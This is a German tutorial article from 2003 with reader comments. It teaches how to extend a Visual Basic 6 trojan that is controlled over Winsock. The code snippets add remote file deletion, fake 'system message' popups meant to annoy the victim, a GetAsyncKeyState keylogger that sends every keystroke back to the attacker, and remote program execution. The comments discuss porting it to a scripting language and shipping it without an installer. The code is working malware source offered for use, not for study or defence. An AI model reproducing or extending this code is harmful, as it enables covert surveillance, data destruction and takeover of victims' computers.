IT-Academy Logo
Sign Up Login Help
Home - Internet - Weitere Funktionen eines Trojaners in VB6



Weitere Funktionen eines Trojaners in VB6

Dieser Artikel erklärt weitere Funktionen von Trojanern, wie z.B. Dateien löschen oder Nachrichten senden.


Autor: N Z (notzomedia)
Datum: 24-12-2003, 20:48:29
Referenzen: keine
Schwierigkeit: Fortgeschrittene
Ansichten: 7201x
Rating: 7 (2x bewertet)

Hinweis:

Für den hier dargestellte Inhalt ist nicht der Betreiber der Plattform, sondern der jeweilige Autor verantwortlich.
Falls Sie Missbrauch vermuten, bitten wir Sie, uns unter missbrauch@it-academy.cc zu kontaktieren.

[Druckansicht] [Als E-Mail senden] [Kommentar verfassen]



Einleitung

Das Grundmodell eines Trojaners und was ein Trojaner überhaupt ist, können Sie in meinem Artikel "Das Trojanische Pferd" nachlesen. Im Artikel "Dateisystemzugriff mit einem Trojaner in VB6" lernen Sie, wie der Trojaner Zugriff auf Ihr Dateisystem hat.

In diesem Artikel geht es um weitere Funktionen wie z.B. Dateien löschen oder eine Nachricht senden.

Dateien löschen

Fügen Sie im Steuerprogramm einen Button ein und schreiben Sie folgenden Code in seine Prozedur:
If MsgBox("Wollen Sie die Datei " & txtpath.Text & " auf Computer " &
WinsockHack.RemoteHostIP & "wirklich löschen?", vbCritical + vbYesNo, "Datei löschen?") = vbNo
Then Exit Sub

WinsockHack.SendData "delete;" & txtpath.Text
Im Textfeld "txtpath" muss die zu löschende Datei mit Pfad angegeben sein.
Zuerst wird gefragt, ob diese Datei gelöscht werden soll, anschließend wird der Befehl "delete;" mit dem vollständigen Dateipfad an den Trojaner geschickt.

Erweitern Sie die Prozedur "WinsockHack_DataArrival" des Trojaners um folgenden Code:
Case "delete"
Kill Right(daten, Len(daten) - InStr(1, daten, ";"))
im Abschnitt "Select Case".
Der empfangene Befehl wird auf "delete" geprüft. Wurde der Befehl erkannt wird die hinter dem Semikolon angegebene Datei gelöscht.

Eine Nachricht an den angegriffenen PC senden

Vielleicht wollen Sie den Opfer-Benutzer mit Nachrichten wie "Systemfehler!" ein wenig ärgern. Erweitern Sie einfach das Steuerprogramm um einen Button "MsgBox" und fügen Sie folgenden Code in dessen Prozedur ein:
WinsockHack.SendData "msgbox;" & InputBox("Ihre Nachricht:")
Klicken Sie nun auf den Button, so wird die Nachricht in einer Eingabebox "InputBox" abgefragt und anschließend mit dem Befehl "msgbox;" an den Trojaner gesendet.
Der Trojaner arbeitet nun die Prozedur "WinsockHack_DataArrival" ab, Sie müssen nur den folgenden Code eingefügt haben:
Case "msgbox"
MsgBox Right(daten, Len(daten) - InStr(1, daten, ";")), vbInformation,
"Systemnachricht"
Beim Befehl "msgbox" öffnet der Trojaner sofort ein Nachrichtenfenster mit Ihrer Nachricht und "Systemnachricht" in der Titelleiste.

Tastatur überwachen

Mit der Windows API Funktion:
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As
Integer
können Sie den Status jeder einzelnen Taste der Tastatur abfragen.
Setzen Sie diese Funktion in einer Schleife (also für jede Taste) in einen Timer mit einem Intervall von vielleicht 50 Millisekunden, oder so viel wie der PC hergibt:
Private Sub Timer1_Timer()
Dim n As Integer

For n = 0 To 255

If GetAsyncKeyState(n) = -32767 Then
		WinsockHack.SendData "Taste:" & n
	End If

Next

End Sub
Die Prozedur fragt den Status von 0 bis 255 ab, es gibt aber nicht so viele Tasten, das Programm lässt sich also noch optimieren, in dem man nur einen bestimmten Satz an Zahlen abfragt, z.B. kann man die Abfrage auf Zahlen und Buchstaben beschränken (funktioniert z.B. mit Arrays).

Beim Steuerprogramm wird der empfangene Befehl verarbeitet:
If Left(daten, Len("Taste:")) = "Taste:" Then
	
txtTaste.Text = txtTaste.Text & vbCrLf & Right(daten, Len(daten)-Len("Taste:"))

End if
Im Textfeld "txtTaste" werden alle empfangenen Tastencodes durch Absätze getrennt gesammelt.
Der Hacker muss diese Zahlencodes nur noch kennen, d.h. richtig übersetzen können, aber mit etwas Programmierarbeit lässt sich das auch automatisieren.

Programme ausführen

Fügen Sie in das Formular des Steuerprogramms einfach einen weiteren Button ein und schreiben Sie folgendes in seine Prozedur:

WinsockHack.SendData "run;" & InputBox("Auszuführendes Programm (Remote):")
Bei Klick auf den Button erscheint ein Eingabefenster, in das Sie den Namen der auszuführenden Datei mit vollständigem Pfad schreiben. Anschließend wird der Befehl "run;" mit dem Dateipfad an den Trojaner gesendet.

Der Trojaner:
Case "run"
Shell Right(daten, Len(daten) - InStr(1, daten, ";")), vbNormalFocus
Zuerst wird der Befehl geprüft, anschließend wird mit "Shell" das Programm ausgeführt. Als weiterer Parameter ist "vbNormalFocus" angegeben, damit wird erreicht, dass das Programm auf Normalgröße (also vom Programm bestimmt) geöffnet wird, außerdem bekommt es den Fokus, d.h. es ist das aktive Fenster (an blauer Titelleiste erkennbar).


Gamma
Rookie
Beitrag vom:
11-12-2005, 12:21:12

ist es eigentlich möglich so einen trojaner auch mit vbs oder einer anderen skriptsprache zu schreiben?

-----------------------------------------------------
die starken leben von den schwachen


notzomedia
Senior Member
Beitrag vom:
26-12-2003, 13:32:50

einfach die dateien mitliefern

es reicht schon, wenn sich die dateien "msvbvm60.dll" also die runtime-bibliothek und das zusatzsteuerelement "mswinsck.ocx" im gleichen ordner wie die .exe-datei befinden..!

-----------------------------------------------------


dav133
Professonial
Beitrag vom:
26-12-2003, 11:53:52

hmm,

an sich ja ganz OK, wenn VB6 nicht ne Installationsroutine bräcuhte. Oder halt die Runtimes. Als alternative lönnte man das ganze noch in eine Textdatei o.ä. schreiben.

Netter artikel, trrotzdem

-----------------------------------------------------


[back to top]



Userdaten
User nicht eingeloggt

Gesamtranking
Werbung
Datenbankstand
Autoren:04510
Artikel:00815
Glossar:04116
News:13565
Userbeiträge:16552
Queueeinträge:06247
News Umfrage
Ihre Anforderungen an ein Online-Zeiterfassungs-Produkt?
Mobile Nutzung möglich (Ipone, Android)
Externe API Schnittstelle/Plugins dritter
Zeiterfassung meiner Mitarbeiter
Exportieren in CSV/XLS
Siehe Kommentar



[Results] | [Archiv] Votes: 1157
Comments: 0